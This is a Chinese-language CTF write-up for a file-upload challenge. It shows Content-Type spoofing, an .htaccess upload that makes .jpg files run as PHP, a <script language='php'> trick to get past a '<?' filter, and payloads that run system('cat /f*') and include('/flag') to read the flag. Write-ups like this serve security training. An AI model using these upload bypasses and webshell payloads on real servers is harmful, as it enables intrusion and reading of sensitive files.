打开题目就一文件上传点

image-20260526194929161

先上传一个空的png文件试试水,响应文件类型上传的太暴露,改成jpeg变正常,返回了文件路径并可以访问

1
/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/100.png succesfully uploaded!

发文件后缀改成php,响应

1
后缀名不能有ph!

这里大概又要借用.htaccess配置文件了,上传.htaccess把所有.jpg文件都看作php文件处理

1
2
3
4
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .jpg

响应

1
/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/.htaccess succesfully uploaded!

可以发现上传到的文件夹名虽然看起来是一个随机值,但是每一个会话上传的文件所在文件夹都是一样的

上传

1
2
3
4
5
6
7
8
9
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?


响应:

诶,别蒙我啊,这标志明显还是php啊

这里是把问号过滤了的,采用html标签的形式绕过

1
<script language="php">system('cat /f*');</script>

上传文件

1
2
3
4
5
6
7
8
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<script language="php">system('cat /f*');</script>

响应:

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg succesfully uploaded!

访问发现危险函数已经被过滤掉了

1
Warning: system() has been disabled for security reasons in /var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg on line 1

我们这里直接包含文件

1
2
3
4
5
6
7
8
9
10
上传:

Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<script language="php">include('/flag');</script>

响应:

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg succesfully uploaded!

访问得到flag

1
flag{afe87f04-9e03-436a-8727-d3499b7aa482}